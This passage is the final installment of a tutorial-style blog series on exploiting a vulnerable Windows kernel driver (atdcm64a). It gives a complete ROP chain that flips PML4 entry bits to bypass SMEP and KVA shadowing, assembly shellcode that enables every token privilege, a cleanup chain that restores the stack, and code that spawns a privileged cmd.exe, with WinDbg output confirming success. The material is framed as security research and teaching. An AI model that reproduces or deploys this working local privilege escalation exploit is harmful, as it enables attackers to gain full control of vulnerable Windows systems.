ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x24d001; index++;// or rax, rcx; ret;
//second round
ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x24d001; index++;// or rax, rcx; ret;
//third round
ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x24d001; index++;// or rax, rcx; ret;
//fourth round
ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x38aa1f; index++;// shl rax, 3; ret;
ropStack[index] = g_ntbase + 0x24d001; index++;// or rax, rcx; ret;
//fifth round
ropStack[index] = g_ntbase + 0x322d1b; index++;// shl rax, 0xc; ret;
ropStack[index] = g_ntbase + 0x2053e5; index++; // pop rcx; ret;
ropStack[index] = (DWORD64)pml4shellcode_index * 8; index++;
ropStack[index] = g_ntbase + 0x24d001; index++;// or rax, rcx; ret;
//<get pml4 address> pml4 address in rax
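As a cross-check, the same sequence of shifts and ORs can be replayed in C and compared with the PXE address that !pte printed earlier. This is a sketch, not the article's CalculatePml4VirtualAddress(); the function names are mine and the self-reference index 0x1FD is the one derived from this session's PTE base.

```c
#include <assert.h>
#include <stdint.h>

/* Index of the PML4 entry that maps a virtual address (bits 39..47). */
uint64_t extract_pml4_index(uint64_t va)
{
    return (va >> 39) & 0x1ff;
}

/* Replays the ROP chain: four rounds of (shl 9, or index), then shl 12 and the entry offset. */
uint64_t pml4e_address_via_gadgets(uint64_t self_ref_index, uint64_t target_va)
{
    uint64_t rax = 0xffff;          /* pop rax; ret */
    uint64_t rcx = self_ref_index;  /* left in rcx by the previous block */

    assert(self_ref_index <= 0x1ff);
    for (int round = 0; round < 4; round++) {
        rax <<= 3;                  /* shl rax, 3; ret */
        rax <<= 3;                  /* shl rax, 3; ret */
        rax <<= 3;                  /* shl rax, 3; ret */
        rax |= rcx;                 /* or rax, rcx; ret */
    }
    rax <<= 0xc;                    /* shl rax, 0xc; ret */
    rcx = extract_pml4_index(target_va) * 8; /* pop rcx; ret */
    rax |= rcx;                     /* or rax, rcx; ret */
    return rax;
}
```

For the shellcode address 0x00001a1a1a003500 the PML4 index is 0x34, and the computed entry address is 0xFFFFFEFF7FBFD1A0, which matches the "PXE at" value in the !pte output.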

We then clear the bit at index 2 (Owner bit = Supervisor) and the bit at index 63 (the NX bit) using the btr instruction:

//<clean owner bit O=S position 2>
ropStack[index] = g_ntbase + 0x34bb9c; index++;// pop rdx; ret;
ropStack[index] = 0x2; index++;
ropStack[index] = g_ntbase + 0x354294; index++;// btr qword ptr [rax], rdx; ret;
//<clean owner bit O=S position 2>

//<clean NX bit position 63>
ropStack[index] = g_ntbase + 0x34bb9c; index++;// pop rdx; ret;
ropStack[index] = 63; index++;
ropStack[index] = g_ntbase + 0x354294; index++;// btr qword ptr [rax], rdx; ret;
//<clean NX bit position 63>

At the end of the chain we just need to execute the wbinvd instruction in order to flush the CPU caches, ensuring the modified bits of the PML4E are actually taken into account, and then redirect execution to our shellcode:

ropStack[index] = g_ntbase + 0x370050; index++; // wbinvd; ret;

//<shellcode>
ropStack[index] = (ULONGLONG)sc; index++;

At this point we can recompile the PoC with our KVA/SMEP bypass ROP chain, set a breakpoint on the second instruction of our shellcode and notice the breakpoint gets hit successfully. We can also check the status of the PML4 entry to notice it was modified successfully:

```
0: kd> !process 0 0 DrvExpTemplate.exe
PROCESS ffffe18f381130c0
    SessionId: 1  Cid: 1e20    Peb: 2d546c7000  ParentCid: 0720
    DirBase: 1aea2f002  ObjectTable: ffff9602f9530040  HandleCount:  51.
    Image: DrvExpTemplate.exe

0: kd> .process /p /r /i ffffe18f381130c0
You need to continue execution (press 'g' <enter>) for the context
to be switched. When the debugger breaks in again, you will be in
the new process context.
0: kd> g
Break instruction exception - code 80000003 (first chance)
nt!DbgBreakPointWithStatus:
fffff800`25e20ca0 cc              int     3
1: kd> dx @$curprocess.Name
@$curprocess.Name : DrvExpTemplate.exe
    Length           : 0x12
1: kd> ba e 1 00001a1a`1a003503
1: kd> g
Breakpoint 0 hit
00001a1a`1a003503 488b08          mov     rcx,qword ptr [rax]
1: kd> uu 00001a1a`1a003500 L5
00001a1a`1a003500 4889c2          mov     rdx,rax
00001a1a`1a003503 488b08          mov     rcx,qword ptr [rax]
00001a1a`1a003506 480fbae902      bts     rcx,2
00001a1a`1a00350b 480fbae93f      bts     rcx,3Fh
00001a1a`1a003510 4831c0          xor     rax,rax
1: kd> uu @rip L1
00001a1a`1a003503 488b08          mov     rcx,qword ptr [rax]
1: kd> !pte @rip
                                           VA 00001a1a1a003503
PXE at FFFFFEFF7FBFD1A0    PPE at FFFFFEFF7FA34340    PDE at FFFFFEFF46868680    PTE at FFFFFE8D0D0D0018
contains 0A000001AA4D0863  contains 0A000001AF9D1867  contains 0A0000019DCD2867  contains 08000001AA0D6867
pfn 1aa4d0    ---DA--KWEV  pfn 1af9d1    ---DA--UWEV  pfn 19dcd2    ---DA--UWEV  pfn 1aa0d6    ---DA--UWEV
```

Increment privileges payload

Here’s the disassembled shellcode payload (generated with https://defuse.ca/online-x86-assembler.htm):

// increment privileges payload
xor    rax,rax
mov    rax,QWORD PTR gs:[rax+0x188]
mov    rax,QWORD PTR [rax+0xb8]
mov    r8,QWORD PTR [rax+0x4b8]
and    r8,0xfffffffffffffff0
movabs r9,0x1ff2ffffbc
mov    QWORD PTR [r8+0x40],r9
mov    QWORD PTR [r8+0x48],r9
xor    rax,rax //just a random instruction

It does the following:

Retrieve the current process’s _EPROCESS structure
Retrieve the associated _TOKEN structure
Modify the fields Present and Enabled of _SEP_TOKEN_PRIVILEGES structure in order to enable all the privileges.
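The constants used by the payload can be sanity-checked in user mode. The sketch below decodes the 0x1ff2ffffbc mask (one bit per privilege LUID) and shows the masking applied to the token reference read from _EPROCESS+0x4b8, whose low 4 bits hold a reference count. The helper names and the sample pointer value are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Mask written to _SEP_TOKEN_PRIVILEGES.Present (+0x40) and .Enabled (+0x48). */
#define PRIV_MASK 0x1ff2ffffbcULL

/* The Token field is an EX_FAST_REF: clear the low 4 bits to get the _TOKEN address. */
uint64_t token_from_fast_ref(uint64_t fast_ref)
{
    return fast_ref & 0xfffffffffffffff0ULL;
}

/* Returns 1 if the privilege with the given LUID (e.g. 20 = SeDebugPrivilege) is in the mask. */
int has_privilege(uint64_t mask, unsigned luid)
{
    assert(luid < 64);
    return (int)((mask >> luid) & 1);
}

/* Counts how many privileges the mask enables. */
int privilege_count(uint64_t mask)
{
    int count = 0;
    while (mask != 0) {
        count += (int)(mask & 1);
        mask >>= 1;
    }
    return count;
}
```

The mask covers LUIDs 2 to 5, 7 to 23, 25 and 28 to 36, that is 31 privileges, which is the set the !token command is expected to report as enabled.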

At this point we can compile our exploit again, set a breakpoint at the last instruction of our shellcode (the final xor rax,rax) and inspect the current token privileges with the !token command. We can see that all the privileges get enabled successfully, as shown below:

0: kd> ba e 1 00001a1a`1a00353f
0: kd> g
Breakpoint 0 hit
00001a1a`1a00353f 4831c0          xor     rax,rax
1: kd> !token
Thread is not impersonating. Using process token...
[...]
Privs: 
 02 0x000000002 SeCreateTokenPrivilege            Attributes - Enabled 
 03 0x000000003 SeAssignPrimaryTokenPrivilege     Attributes - Enabled 
 04 0x000000004 SeLockMemoryPrivilege             Attributes - Enabled 
 05 0x000000005 SeIncreaseQuotaPrivilege          Attributes - Enabled 
 07 0x000000007 SeTcbPrivilege                    Attributes - Enabled 
 08 0x000000008 SeSecurityPrivilege               Attributes - Enabled 
 09 0x000000009 SeTakeOwnershipPrivilege          Attributes - Enabled 
 10 0x00000000a SeLoadDriverPrivilege             Attributes - Enabled 
 11 0x00000000b SeSystemProfilePrivilege          Attributes - Enabled 
 12 0x00000000c SeSystemtimePrivilege             Attributes - Enabled 
 13 0x00000000d SeProfileSingleProcessPrivilege   Attributes - Enabled 
 14 0x00000000e SeIncreaseBasePriorityPrivilege   Attributes - Enabled 
 15 0x00000000f SeCreatePagefilePrivilege         Attributes - Enabled 
 16 0x000000010 SeCreatePermanentPrivilege        Attributes - Enabled 
 17 0x000000011 SeBackupPrivilege                 Attributes - Enabled 
 18 0x000000012 SeRestorePrivilege                Attributes - Enabled 
 19 0x000000013 SeShutdownPrivilege               Attributes - Enabled 
 20 0x000000014 SeDebugPrivilege                  Attributes - Enabled 
 21 0x000000015 SeAuditPrivilege                  Attributes - Enabled 
 22 0x000000016 SeSystemEnvironmentPrivilege      Attributes - Enabled 
 23 0x000000017 SeChangeNotifyPrivilege           Attributes - Enabled Default 
 25 0x000000019 SeUndockPrivilege                 Attributes - Enabled 
 28 0x00000001c SeManageVolumePrivilege           Attributes - Enabled 
 29 0x00000001d SeImpersonatePrivilege            Attributes - Enabled 
 30 0x00000001e SeCreateGlobalPrivilege           Attributes - Enabled Default 
 31 0x00000001f SeTrustedCredManAccessPrivilege   Attributes - Enabled 
 32 0x000000020 SeRelabelPrivilege                Attributes - Enabled 
 33 0x000000021 SeIncreaseWorkingSetPrivilege     Attributes - Enabled 
 34 0x000000022 SeTimeZonePrivilege               Attributes - Enabled 
 35 0x000000023 SeCreateSymbolicLinkPrivilege     Attributes - Enabled 
 36 0x000000024 SeDelegateSessionUserImpersonatePrivilege  Attributes - Enabled 
Authentication ID:         (0,5c94a)
Impersonation Level:       Anonymous
TokenType:                 Primary
[...]

Restoring execution

At this point we must find a way to restore the execution flow so that we do not cause a BSOD after executing our shellcode. We have two options:

Executing a sysret instruction. This is the counterpart of syscall and allows transitioning from kernel-mode to user-mode.
Resetting the stack pointer to the right location in the stack so that the execution flow resumes from where it was hijacked.

I preferred to go with the second option as in my opinion it is cleaner and does not leave the memory in an inconsistent state.

The first option instead may, for example, cause memory leaks or leave some mutexes locked. This is because the functions in the call stack won’t finish normally, which means the resources they acquired (locks, allocations in the pool…) may not be released.

We will also have to restore the PML4 entry to its original value, as I ran into issues when our process tried to exit without doing so.

Retrieving the original value of the stack pointer

An easy way to retrieve the original value of the stack pointer, as it was before we tampered with it using the pivot gadget, is to rely on the following assumption:

The stack frames in the call stack always have the same size. If this is true, then the offset between the initial stack pointer (the InitialStack field of _KTHREAD) and the stack pointer at the moment of the hijack will always be the same.

Let’s verify this in WinDbg. Let’s put a breakpoint at atdcm64a+0x223f, that is where our vulnerable driver calls IofCallDriver():

1: kd> ba e 1 fffff800`2d9f223f
1: kd> g
Breakpoint 1 hit
atdcm64a+0x223f:
fffff800`2d9f223f ff15fb2d0000    call    qword ptr [atdcm64a+0x5040 (fffff800`2d9f5040)]
0: kd> t
nt!IofCallDriver:
fffff800`25cebea0 4883ec38        sub     rsp,38h
0: kd>

Let’s step until we reach jmp rax, inside nt!guard_dispatch_icall, the instruction that allows us to hijack the execution flow. Now, let’s inspect the call stack:

1: kd> p
nt!guard_dispatch_icall+0x71:
fffff800`25e21b01 ffe0            jmp     rax
1: kd> k
 # Child-SP          RetAddr               Call Site
00 ffffde08`f566f458 fffff800`25cebef5     nt!guard_dispatch_icall+0x71
01 ffffde08`f566f460 fffff800`2d9f2245     nt!IofCallDriver+0x55
02 ffffde08`f566f4a0 fffff800`2d9f16c3     atdcm64a+0x2245
03 ffffde08`f566f520 fffff800`25cebef5     atdcm64a+0x16c3
04 ffffde08`f566f720 fffff800`26140060     nt!IofCallDriver+0x55
05 ffffde08`f566f760 fffff800`26141a90     nt!IopSynchronousServiceTail+0x1d0
06 ffffde08`f566f810 fffff800`26141376     nt!IopXxxControlFile+0x700
07 ffffde08`f566fa00 fffff800`25e2bbe5     nt!NtDeviceIoControlFile+0x56
08 ffffde08`f566fa70 00007ff8`01b6f454     nt!KiSystemServiceCopyEnd+0x25
09 0000007c`fd2ffbb8 00007fff`ff27664b     0x00007ff8`01b6f454
0a 0000007c`fd2ffbc0 0000007c`fd2ffc30     0x00007fff`ff27664b
0b 0000007c`fd2ffbc8 0000007c`fd2ffc38     0x0000007c`fd2ffc30
0c 0000007c`fd2ffbd0 0000007c`fd2ffc40     0x0000007c`fd2ffc38
0d 0000007c`fd2ffbd8 00000000`00000000     0x0000007c`fd2ffc40

From the call stack we can see that after nt!guard_dispatch_icall the execution should return to 0xfffff80025cebef5 (first row in the call stack).

If we inspect the data stored in the stack, starting from RSP, we can see the return address is at address 0xffffde08f566f458 in the stack:

1: kd> dq @rsp
ffffde08`f566f458  fffff800`25cebef5 00000000`00000000
ffffde08`f566f468  fffff800`25cebea0 00000000`00000010
ffffde08`f566f478  00000000`00040304 ffffde08`f566f498
ffffde08`f566f488  00000000`00000018 ffffde08`f566f4a0
ffffde08`f566f498  fffff800`2d9f2245 0000001a`ff000000
ffffde08`f566f4a8  00000000`00000000 ffffe18f`323e500d
ffffde08`f566f4b8  fffff800`25dd763f 00000000`00000000
ffffde08`f566f4c8  ffffde08`f566f4f0 ffffde08`f566f4e0

Let’s also retrieve the _ETHREAD and _KTHREAD structs of our current thread:

1: kd> !thread
THREAD ffffe18f35335080  Cid 1304.08d4  Teb: 0000007cfd07a000 Win32Thread: 0000000000000000 RUNNING on processor 1
IRP List:
    ffffe18f36d48000: (0006,1360) Flags: 00060000  Mdl: 00000000
    ffffe18f34c31cd0: (0006,0118) Flags: 00060070  Mdl: 00000000
[...]
1: kd> dt nt!_ETHREAD  ffffe18f35335080 
   +0x000 Tcb              : _KTHREAD
   +0x480 CreateTime       : _LARGE_INTEGER 0x01dad54a`f0da9edd
[...]
1: kd> dx -id 0,0,ffffe18f36a840c0 -r1 (*((ntkrnlmp!_KTHREAD *)0xffffe18f35335080))
(*((ntkrnlmp!_KTHREAD *)0xffffe18f35335080))                 [Type: _KTHREAD]
    [+0x000] Header           [Type: _DISPATCHER_HEADER]
    [+0x018] SListFaultAddress : 0x0 [Type: void *]
    [+0x020] QuantumTarget    : 0x79a5af2 [Type: unsigned __int64]
    [+0x028] InitialStack     : 0xffffde08f566fc70 [Type: void *]
    [+0x030] StackLimit       : 0xffffde08f566a000 [Type: void *]
    [+0x038] StackBase        : 0xffffde08f5670000 [Type: void *]
    [+0x040] ThreadLock       : 0x0 [Type: unsigned __int64]
[...]

Notice the value of InitialStack.

If we subtract the current value of RSP from InitialStack we get an offset of 0x818.

1: kd> ? 0xffffde08f566fc70-ffffde08`f566f458
Evaluate expression: 2072 = 00000000`00000818

If we repeat the same procedure after restarting the system we are going to notice the offset between RSP and InitialStack won’t change.

Therefore, in order to retrieve the original value of RSP, before tampering it with our pivot gadget, we can:

Retrieve the _KTHREAD structure of the current thread from the gs register.
Retrieve the value of InitialStack from _KTHREAD.
Subtract 0x818 from InitialStack. The result of the subtraction is the original value of rsp before we tampered with it.

Crafting the cleanup ROP chain

Now that we know how to retrieve the original value of RSP, we need to modify our shellcode and craft a cleanup ROP chain that will perform the following operations:

Restore the original value of the PML4 entry.
Restore the original value of RSP so that execution flow can proceed as it was supposed to before we hijacked it.

Here’s the final shellcode:

// storing in RCX original PML4E value
mov    rdx,rax
mov    rcx,QWORD PTR [rax]
bts    rcx,0x2
bts    rcx,0x3f

// increment privileges payload
xor    rax,rax
mov    rax,QWORD PTR gs:[rax+0x188]
mov    rax,QWORD PTR [rax+0xb8]
mov    r8,QWORD PTR [rax+0x4b8]
and    r8,0xfffffffffffffff0
movabs r9,0x1ff2ffffbc
mov    QWORD PTR [r8+0x40],r9
mov    QWORD PTR [r8+0x48],r9

// storing in cleanup ropchain original rsp value
xor    rax,rax
mov    rax,QWORD PTR gs:[rax+0x188]
mov    rax,QWORD PTR [rax+0x28]
sub    rax,0x818
mov    QWORD PTR [rsp+0x20],rax
mov    rax,rcx
ret

Before the increment privileges payload we perform the following operations:

Move the PML4E’s address into rdx.
Recompute the original PML4E value (by setting bits 2 and 63 again) and store it in rcx.

After the increment privileges payload we perform the following operations:

Use rax in order to retrieve the InitialStack field from the current thread’s _KTHREAD structure.
Subtract offset 0x818 from rax in order to obtain the original rsp value.
Store the original rsp value in our cleanup ROP chain with the mov QWORD PTR [rsp+0x20],rax instruction.
Move the original value of the PML4E into rax.

Here’s our cleanup ROP chain that is executed after the shellcode:

//<shellcode>
ropStack[index] = (ULONGLONG)sc; index++;

//<cleanup>
ropStack[index] = g_ntbase + 0x35dbc9; index++; // mov qword ptr [rdx], rax; ret;
ropStack[index] = g_ntbase + 0x3d4cba; index++; // xor rax, rax; ret;
ropStack[index] = g_ntbase + 0x370050; index++; // wbinvd; ret;
ropStack[index] = g_ntbase + 0x20505a; index++; // pop rsp; ret;
ropStack[index] = 0x4141414141414141; index++; // filled with rsp value
//<cleanup>

In this final ROP chain we first restore the PML4 entry value: remember that the shellcode leaves the address of the PML4E in rdx and its original value in rax. Finally, we pop into RSP the value the stack pointer had before we hijacked execution with the pivot gadget.

The value 0x4141414141414141 in the ROP chain is just a dummy value that is replaced with the real value by the mov QWORD PTR [rsp+0x20],rax instruction executed in our shellcode.

Getting a high-privileged shell

So, we are just left with spawning a cmd.exe at the end of our exploit, and if the ROP chain completes successfully we should get a shell with all privileges enabled. We can use the system() function at the end of our main() function in order to easily spawn a shell.

int main()
{
    [...]
    arbitraryCallDriver(outputBuffer, SIZE_BUF);
    printf("[+] arbitraryCallDriver returned successfully.\n");
    printf("[*] spawning system shell...\n");
    system("cmd.exe");
    return 0;
}

The full code of the exploit is available here on GitHub (master branch). At this point after compiling our exploit we should obtain a shell with all privileges enabled!

Conclusion

In this series of articles, I explained the process of finding vulnerabilities in kernel drivers using manual static analysis techniques and developing an exploit that takes advantage of an arbitrary pointer dereference.

Credits

Credits go to:

@ommadawn46, for his awesome article about how KVA works and how to bypass it.
Enrique Nissim and Nicolas Economou, for their research paper.
Alexandru Uifalvi and Morten Schenk for the exploit code.

In addition I would like to thank:

Cedric Halbronn for his amazing courses on OST2.
Connor McGarr and Paolo Stagno for their awesome blog posts on the topic.
Igor Skochinsky for the “Igor’s tips” series on Hex-Rays (everything I’ve learned about IDA Pro came from his tips).

Contacts

If you have any questions, feel free to reach me at the following contacts: